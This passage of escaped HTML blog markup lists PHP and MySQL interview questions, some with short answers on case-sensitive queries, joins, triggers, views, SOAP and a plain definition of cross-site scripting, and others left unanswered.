&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="line-height: 16px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;SQL itself isn't case sensitive, but it can be on searching data, all depends on the table collation settings.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="background-color: #fafafa; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;MySQL syntax is not case sensitive, you can write&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;SELECT * FROM table WHERE ...&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;or&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;select * from table where...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;or&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;SeLEct * FroM table WHerE&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;or whatever else you want.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br style="background-color: #fafafa;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #fafafa;"&gt;On select queries you can search for case sensitive fields values, in example if you want to find "text" inside a field but not "TEXT", "Text".... you can use&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br style="background-color: #fafafa;" /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: #fafafa; font-family: Arial, Helvetica, sans-serif;"&gt;SELECT * FROM table WHERE binary(fieldname)='text';&lt;/span&gt;&lt;/div&gt;
&lt;div class="refpurpose" style="line-height: normal; text-align: -webkit-auto;"&gt;
&lt;span class="dc-title"&gt;&lt;span class="dc-title" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; margin-bottom: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline; word-wrap: break-word;"&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;b&gt;18 ) You have a table say user with field name and data’s Lokam , loker , lover , Lough , Lost , Enough , Elephant etc . Write a query which gives all the terms Lokam , loker , lover , Lough and Lost .&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;b&gt;19 ) Now you want to select only the loker , lover . What will you add to get this result ?&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;b style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Arial, Helvetica, sans-serif;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;20 ) Let there is table user with name and marks . How will you select the second largest number from this table ?&amp;nbsp; For eg let the data’s are&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;hari 23 , jenson 10 , ruby 20 , rijith 10 . You want to select 20 from this.&lt;/b&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;21 ) What are the different types of JOINS ?&lt;/b&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;A join combines records from two or more tables in a relational database. In the Structured Query Language (SQL), there are two types of joins: "inner" and "outer". Outer joins are subdivided further into left outer joins, right outer joins, and full outer joins.&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Inner join&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;This is the default join method if nothing else is specified. An inner join essentially finds the intersection between the two tables. The join &amp;nbsp;takes all the records from table A and finds the matching record(s) from table B. If no match is found, the record from A is not included in the results. If multiple results are found in B that match the predicate then one row will be returned for each (the values from A will be repeated).&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Special care must be taken when joining tables on columns that can be NULL since NULL values will never match each other&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Left outer join&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;A left outer join is very different from an inner join. Instead of limiting results to those in both tables, it limits results to those in the "left" table (A). This means that if the ON clause matches 0 records in B, a row in the result will still be returned—but with NULL values for each column from B.&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Right outer join&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;A right outer join is much like a left outer join, except that the tables are reversed. Every record from the right side, B, will be returned, and NULL values will be returned for those that have no matching record in A.&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Full outer join&lt;/span&gt;&lt;br style="line-height: normal;" /&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;Full outer joins are the combination of left and right outer joins. These joins will show records from both tables, and fill in NULLs for missing matches on either side&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;22 ) What is LEFT , RIGHT&amp;nbsp;, INNER joins ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;23 ) Have you used Triggers ? What is it ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;A&amp;nbsp;&lt;/span&gt;&lt;span style="line-height: 19px;"&gt;&lt;i&gt;database trigger&lt;/i&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&lt;i&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/i&gt;is&amp;nbsp;&lt;/span&gt;procedural code&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;that is automatically executed in response to certain events on a particular&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Table_(database)" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Table (database)"&gt;table&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;or&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/View_(database)" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="View (database)"&gt;view&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;in a&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Database" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Database"&gt;database&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;The trigger is mostly used for keeping the integrity of the information on the database.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;For example, when a new record (representing a new worker) is added to the employees table, new records should be created also in the tables of the taxes, vacations, and salaries.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;24 ) What is Views in MySQL ?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 20px;"&gt;A database&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: justify;"&gt;&amp;nbsp;View is known as a "virtual table" which allows you to query the data&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: justify;"&gt;&amp;nbsp;in it.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: justify;"&gt;Understanding&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: justify;"&gt;Database&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: justify;"&gt;&amp;nbsp;View and using it correctly is crucial.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 18px;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;MySQL views are essentially a way to package up SELECT statements into re-usable virtual tables whereby the data can be retrieved simply by referencing the view, rather than having to repeat the associated SELECT statement.&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 20px; text-align: justify;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;25 ) Have you written procedures ? How can you write a procedure in MySQL ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;26 ) How can you call a mysql procedure from PHP ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;27 ) What is MVC ? ( If you are strong in any frameworks , then questions from that can also be hit, don’t make it a miss rate&amp;nbsp;)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b style="font-family: Arial, Helvetica, sans-serif; line-height: 21px; text-align: left;"&gt;Ans:&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;28 ) Does PHP&amp;nbsp;has an XML&amp;nbsp;library ? Is it comming as default ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;29 ) What’s SOAP ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span style="line-height: 19px;"&gt;&lt;i&gt;SOAP&lt;/i&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;, originally defined as&amp;nbsp;&lt;/span&gt;&lt;span style="line-height: 19px;"&gt;&lt;i&gt;Simple Object Access Protocol&lt;/i&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;, is a&amp;nbsp;&lt;/span&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Protocol_(computing)" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Protocol (computing)"&gt;protocol&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;specification for exchanging structured information in the implementation of&amp;nbsp;&lt;/span&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Web_Service" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Web Service"&gt;Web Services&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;in&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Computer_network" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Computer network"&gt;computer networks&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;It relies on&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/XML" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="XML"&gt;Extensible Markup Language&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;(XML) for its message format, and usually relies on other&amp;nbsp;&lt;/span&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Application_Layer" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Application Layer"&gt;Application Layer&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;protocols, most notably&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Hypertext Transfer Protocol"&gt;Hypertext Transfer Protocol&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;(HTTP) and&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Simple Mail Transfer Protocol"&gt;Simple Mail Transfer Protocol&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;(SMTP), for message negotiation and transmission. SOAP can form the foundation layer of a&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Web_services_protocol_stack" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Web services protocol stack"&gt;web services protocol stack&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;, providing a basic messaging framework upon which web services can be built.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; line-height: 18px; margin-bottom: 15px; outline-color: initial; outline-style: initial; outline-width: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;30 ) What’s is XSS attack ?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;b&gt;Ans:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;i&gt;&lt;span style="line-height: 19px;"&gt;Cross-site scripting&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;(&lt;/span&gt;&lt;span style="line-height: 19px;"&gt;XSS&lt;/span&gt;&lt;/i&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&lt;i&gt;)&lt;b&gt; &lt;/b&gt;&lt;/i&gt;is a type of&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Computer_insecurity" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Computer insecurity"&gt;computer security&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Vulnerability_(computer_science)" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Vulnerability (computer science)"&gt;vulnerability&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;typically found in&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Web_application" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Web application"&gt;Web applications&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;that enables attackers to&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Code_injection" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Code injection"&gt;inject&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/Client-side_script" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Client-side script"&gt;client-side script&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;into&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Web_page" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Web page"&gt;Web pages&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;viewed by other users.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 21px;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;A cross-site scripting vulnerability may be used by attackers to bypass&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Access_control" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Access control"&gt;access controls&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&amp;nbsp;such as the&amp;nbsp;&lt;/span&gt;&lt;a href="http://en.wikipedia.org/wiki/Same_origin_policy" style="background-attachment: initial; background-clip: initial; background-image: none; background-origin: initial; line-height: 19px; text-decoration: none;" title="Same origin policy"&gt;same origin policy&lt;/a&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
